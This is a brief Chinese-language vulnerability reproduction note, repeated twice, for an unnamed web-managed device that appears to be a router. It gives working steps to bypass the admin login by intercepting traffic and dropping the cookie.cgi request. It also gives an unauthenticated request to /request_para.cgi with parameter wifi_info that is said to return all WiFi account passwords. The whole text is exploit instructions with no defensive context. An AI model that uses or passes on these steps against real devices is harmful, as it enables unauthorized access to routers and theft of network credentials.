漏洞复现
1.打开登录页面
2.访问 http://IP/home/index.html。抓包drop掉cookie.cgi这个包,然后一直放包即可
3.成功登录后台
敏感信息泄露
/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码
1.打开登录页面
2.访问 http://IP/home/index.html。抓包drop掉cookie.cgi这个包,然后一直放包即可
3.成功登录后台
/request_para.cgi?parameter=wifi_info #获取ALL WIFI账号密码